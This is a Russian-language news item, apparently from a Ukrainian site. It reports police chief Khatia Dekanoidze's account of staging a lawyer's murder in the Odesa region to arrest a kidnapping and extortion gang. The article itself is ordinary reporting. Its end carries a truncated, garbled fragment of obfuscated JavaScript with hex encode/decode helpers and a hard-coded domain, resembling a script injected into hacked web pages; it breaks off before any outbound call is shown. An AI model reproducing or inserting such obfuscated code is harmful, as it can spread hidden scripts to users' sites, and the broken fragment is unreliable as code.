В Одессе пришлось инсценировать убийство адвоката, чтобы задержать похитителей людей, – Хатия Деканоидзе «фото»

В Одессе пришлось инсценировать убийство адвоката, чтобы задержать похитителей людей, – Хатия Деканоидзе

 

ава (18)

Как сообщает корреспондент Украинской Службы Информации, об этом на своей странице в соцсети Facebook сообщила глава Национальной полиции Украины Хатия Деканоидзе.

Вчера ночью в Одесской области мы задержали группировку, которая специализировалась на похищении людей, шантаже и убийствах. В течение нескольких лет жертвами в основном становились люди из социально незащищенных слоев населения, которых похищали и заставляли переоформлять недвижимость на членов банды, – сообщила Деканоидзе.

По ее словам, в полицию обратился адвокат, который занимает активную позицию в раскрытии преступных схем в сфере распределения земельных участков в курортных районах Одесской области. Заявитель сообщил, что получил в свой адрес угрозы в связи с его деятельностью – реализацией инвестпроекта по строительству набережной в Затоке.

В течение нескольких месяцев правоохранители документировали факт подготовки злоумышленников к совершению заказного убийства. Для задержания организаторов и посредников покушения несколько дней назад правоохранителям пришлось инсценировать убийство адвоката-заявителя, – сообщила она.

В результате проведения хорошо спланированной спецоперации под руководством Главного следственного управления Национальной полиции и Департамента внутренней безопасности Национальной полиции Украины удалось задержать подозреваемых, а также освободить заложника, который был похищен ранее с целью вымогательства.

Сейчас проведено около 30 обысков, в ходе которых изъято огнестрельное оружие. Следствие продолжается. Глава Нацполиции Украины поблагодарила всю команду, которая участвовала в задержании банды.

Как сообщала USIonline.com, в Одессе неизвестные расстреляли человека.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e